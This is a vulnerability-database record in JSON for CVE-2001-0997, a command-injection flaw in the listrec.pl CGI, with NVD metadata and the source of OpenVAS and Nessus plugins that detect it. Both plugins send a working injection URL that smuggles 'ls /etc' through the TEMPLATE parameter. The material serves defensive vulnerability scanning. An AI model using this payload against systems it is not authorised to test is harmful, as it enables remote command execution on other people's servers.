{"id": "CVE-2001-0997", "bulletinFamily": "NVD", "title": "CVE-2001-0997", "description": "Textor Webmasters Ltd listrec.pl CGI program allows remote attackers to execute arbitrary commands via shell metacharacters in the TEMPLATE parameter.", "published": "2001-09-11T00:00:00", "modified": "2017-12-18T21:29:30", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2001-0997", "reporter": "NVD", "references": ["http://archives.neohapsis.com/archives/bugtraq/2001-09/0096.html", "https://exchange.xforce.ibmcloud.com/vulnerabilities/7117"], "cvelist": ["CVE-2001-0997"], "type": "cve", "lastseen": "2017-12-19T12:21:04", "history": [{"bulletin": {"assessment": {"href": "", "name": "", "system": ""}, "bulletinFamily": "NVD", "cpe": ["cpe:/a:textor_webmasters_ltd.:listrec.pl:1.0"], "cvelist": ["CVE-2001-0997"], "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "description": "Textor Webmasters Ltd listrec.pl CGI program allows remote attackers to execute arbitrary commands via shell metacharacters in the TEMPLATE parameter.", "edition": 1, "enchantments": {"score": {"modified": "2016-09-03T03:06:41", "value": 6.5}}, "hash": "54ef0d23fda946be21eacb3538fabca6e4c03f444cb8f38a03a9ac3a28bad952", "hashmap": [{"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "scanner"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "reporter"}, {"hash": "80e618b9eb3d3e1ff0228c33c8b3956e", "key": "modified"}, {"hash": "2c6c4a69b363a6e6e952f8e649776836", "key": "cvelist"}, {"hash": "43f89f32dbfb77ffd794e1b1b3958400", "key": "href"}, {"hash": "6d3f4796275bb54c21a33b82f399cc6d", "key": "assessment"}, {"hash": "e5d275b3ebd62646b78320753699e02e", "key": "cvss"}, {"hash": "0cd07c9126ee2fde06a8a98adfb3c52f", "key": "references"}, {"hash": "5f10a8ae36c9f8e14fd640cdee6053eb", "key": "published"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "17705ebf6089b97c588846c8c2064b71", "key": "description"}, {"hash": "4a7f4f31889c1dc32fbd9ec7dc830c77", "key": "title"}, {"hash": "d6673794c5e02ed1d9fcda88830dc4a2", "key": "cpe"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2001-0997", "id": "CVE-2001-0997", "lastseen": "2016-09-03T03:06:41", "modified": "2008-09-05T16:25:25", "objectVersion": "1.2", "published": "2001-09-11T00:00:00", "references": ["http://archives.neohapsis.com/archives/bugtraq/2001-09/0096.html", "http://xforce.iss.net/static/7117.php"], "reporter": "NVD", "scanner": [], "title": "CVE-2001-0997", "type": "cve", "viewCount": 0}, "differentElements": ["references", "modified"], "edition": 1, "lastseen": "2016-09-03T03:06:41"}], "edition": 2, "hashmap": [{"key": "assessment", "hash": "6d3f4796275bb54c21a33b82f399cc6d"}, {"key": "bulletinFamily", "hash": "601892ece72be3be2f57266ca2354792"}, {"key": "cpe", "hash": "d6673794c5e02ed1d9fcda88830dc4a2"}, {"key": "cvelist", "hash": "2c6c4a69b363a6e6e952f8e649776836"}, {"key": "cvss", "hash": "e5d275b3ebd62646b78320753699e02e"}, {"key": "description", "hash": "17705ebf6089b97c588846c8c2064b71"}, {"key": "href", "hash": "43f89f32dbfb77ffd794e1b1b3958400"}, {"key": "modified", "hash": "0c6a6ad8229190fba7cbf0d1e928f1df"}, {"key": "published", "hash": "5f10a8ae36c9f8e14fd640cdee6053eb"}, {"key": "references", "hash": "8bb7c2b77ba8e0630bd327346b5f4f81"}, {"key": "reporter", "hash": "601892ece72be3be2f57266ca2354792"}, {"key": "scanner", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "title", "hash": "4a7f4f31889c1dc32fbd9ec7dc830c77"}, {"key": "type", "hash": "1716b5fcbb7121af74efdc153d0166c5"}], "hash": "08d51e9b7f6b46d95b9f5cdb21d37a0791c30492df9281f2176c69d2d2a942e8", "viewCount": 0, "enchantments": {"score": {"value": 7.5, "vector": "NONE", "modified": "2017-12-19T12:21:04"}, "dependencies": {"references": [{"type": "openvas", "idList": ["OPENVAS:136141256231010769"]}, {"type": "osvdb", "idList": ["OSVDB:640"]}, {"type": "nessus", "idList": ["LISTREC.NASL"]}], "modified": "2017-12-19T12:21:04"}, "vulnersScore": 7.5}, "objectVersion": "1.3", "cpe": ["cpe:/a:textor_webmasters_ltd.:listrec.pl:1.0"], "assessment": {"href": "", "name": "", "system": ""}, "scanner": []}

{"openvas": [{"lastseen": "2018-09-01T23:35:51", "bulletinFamily": "scanner", "description": "The 'listrec.pl' cgi is installed. This CGI has\n a security flaw that lets an attacker execute arbitrary\n commands on the remote server, usually with the privileges of the web server.", "modified": "2017-05-02T00:00:00", "published": "2005-11-03T00:00:00", "id": "OPENVAS:136141256231010769", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231010769", "title": "Checks for listrec.pl", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: listrec.nasl 6056 2017-05-02 09:02:50Z teissa $\n#\n# Checks for listrec.pl\n#\n# Authors:\n# Matt Moore <matt@westpoint.ltd.uk>\n#\n# Copyright:\n# Copyright (C) 2001 Matt Moore\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.10769\");\n script_version(\"$Revision: 6056 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-05-02 11:02:50 +0200 (Tue, 02 May 2017) $\");\n script_tag(name:\"creation_date\", value:\"2005-11-03 14:08:04 +0100 (Thu, 03 Nov 2005)\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_cve_id(\"CVE-2001-0997\");\n script_name(\"Checks for listrec.pl\");\n script_category(ACT_ATTACK);\n script_copyright(\"This script is Copyright (C) 2001 Matt Moore\");\n script_family(\"Web application abuses\");\n script_dependencies(\"find_service.nasl\", \"http_version.nasl\");\n script_require_ports(\"Services/www\", 80);\n script_exclude_keys(\"Settings/disable_cgi_scanning\");\n\n tag_summary = \"The 'listrec.pl' cgi is installed. This CGI has\n a security flaw that lets an attacker execute arbitrary\n commands on the remote server, usually with the privileges of the web server.\";\n\n tag_solution = \"Remove it from /cgi-bin/common/.\";\n\n script_tag(name:\"solution\", value:tag_solution);\n script_tag(name:\"summary\", value:tag_summary);\n\n script_tag(name:\"qod_type\", value:\"remote_analysis\");\n\n exit(0);\n}\n\ninclude(\"http_func.inc\");\ninclude(\"http_keepalive.inc\");\n\nport = get_http_port( default:80 );\n\nforeach dir( make_list_unique( \"/\", \"/cgi-bin/common\", \"/cgi-local\", \"/cgi_bin\", cgi_dirs( port:port ) ) ) {\n\n if( dir == \"/\" ) dir = \"\";\n url = string( dir, \"/listrec.pl?APP=qmh-news&TEMPLATE=;ls%20/etc|\" );\n\n if( http_vuln_check( port:port, url:url, pattern:\"resolv.conf\" ) ) {\n report = report_vuln_url( port:port, url:url );\n security_message( port:port, data:report );\n exit( 0 );\n }\n}\n\nexit( 99 );\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "osvdb": [{"lastseen": "2017-04-28T13:19:55", "bulletinFamily": "software", "description": "# No description provided by the source\n\n## References:\nSnort Signature ID: 1470\nSecurity Tracker: 1002404\n[Nessus Plugin ID:10769](https://vulners.com/search?query=pluginID:10769)\nISS X-Force ID: 7117\n[CVE-2001-0997](https://vulners.com/cve/CVE-2001-0997)\n", "modified": "2001-09-11T00:00:00", "published": "2001-09-11T00:00:00", "href": "https://vulners.com/osvdb/OSVDB:640", "id": "OSVDB:640", "title": "Textor Webmasters Ltd listrec.pl TEMPLATE Variable Arbitrary Command Execution", "type": "osvdb", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "nessus": [{"lastseen": "2019-02-21T01:07:42", "bulletinFamily": "scanner", "description": "The 'listrec.pl' cgi is installed. This CGI has a security flaw that lets an attacker execute arbitrary commands on the remote server, usually with the privileges of the web server.", "modified": "2018-06-13T00:00:00", "id": "LISTREC.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=10769", "published": "2001-09-26T00:00:00", "title": "Textor Webmasters Ltd listrec.pl TEMPLATE Parameter Arbitrary Command Execution", "type": "nessus", "sourceData": "#\n# This script written by Matt Moore <matt@westpoint.ltd.uk> \n#\n# See the Nessus Scripts License for details\n#\n\n# Changes by Tenable:\n# - Revised plugin title (12/30/10)\n\ninclude(\"compat.inc\");\n\nif(description)\n{\n script_id(10769);\n script_version (\"1.25\");\n script_cvs_date(\"Date: 2018/06/13 18:56:27\");\n\n script_cve_id(\"CVE-2001-0997\");\n \n script_name(english:\"Textor Webmasters Ltd listrec.pl TEMPLATE Parameter Arbitrary Command Execution\");\n \n script_set_attribute(attribute:\"synopsis\", value:\n\"Arbitray commands may be run on the remote host.\" );\n script_set_attribute(attribute:\"description\", value:\n\"The 'listrec.pl' cgi is installed. This CGI has a security flaw that \nlets an attacker execute arbitrary commands on the remote server, \nusually with the privileges of the web server.\" );\n script_set_attribute(attribute:\"solution\", value:\n\"Remove it from /cgi-bin/common/.\" );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.textor.com/index.html\" );\n script_set_attribute(attribute:\"see_also\", value:\"http://www.securitytracker.com/alerts/2001/Sep/1002404.html\" );\n\n\n script_set_attribute(attribute:\"plugin_publication_date\", value: \"2001/09/26\");\n script_set_attribute(attribute:\"vuln_publication_date\", value: \"2001/09/11\");\nscript_set_attribute(attribute:\"plugin_type\", value:\"remote\");\nscript_end_attributes();\n\n \n summary[\"english\"] = \"Checks for the listrec.pl CGI\";\n \n script_summary(english:summary[\"english\"]);\n \n script_category(ACT_GATHER_INFO);\n \n script_copyright(english:\"This script is Copyright (C) 2001-2018 Matt Moore \");\n script_family(english:\"CGI abuses\");\n\n script_dependencie(\"http_version.nasl\", \"find_service1.nasl\", \"no404.nasl\");\n script_require_ports(\"Services/www\", 80);\n script_exclude_keys(\"Settings/disable_cgi_scanning\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\n\ninclude(\"global_settings.inc\");\ninclude(\"http_func.inc\");\ninclude(\"http_keepalive.inc\");\n\nport = get_http_port(default:80);\n\n\nif(!get_port_state(port))exit(0);\n\n\ndir[0] = \"/cgi-bin/common\";\ndir[1] = \"/cgi-local\";\ndir[2] = \"/cgi_bin\";\ndir[3] = \"\";\n\n for(i=0; dir[i]; i = i + 1)\n {\n item = string(dir[i], \"/listrec.pl?APP=qmh-news&TEMPLATE=;ls%20/etc|\");\n req = http_get(item:item, port:port);\n res = http_keepalive_send_recv(port:port, data:req);\n if( res == NULL ) exit(0);\n if(\"resolv.conf\" >< res) {\n \t security_hole(port);\n\t exit(0);\n\t} \n }\n \n\nforeach dir (cgi_dirs())\n{\n item = string(dir, \"/listrec.pl?APP=qmh-news&TEMPLATE=;ls%20/etc|\");\n req = http_get(item:item, port:port);\n res = http_keepalive_send_recv(port:port, data:req);\n if( res == NULL ) exit(0);\n if(\"resolv.conf\" >< res)security_hole(port);\n}\n\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}]}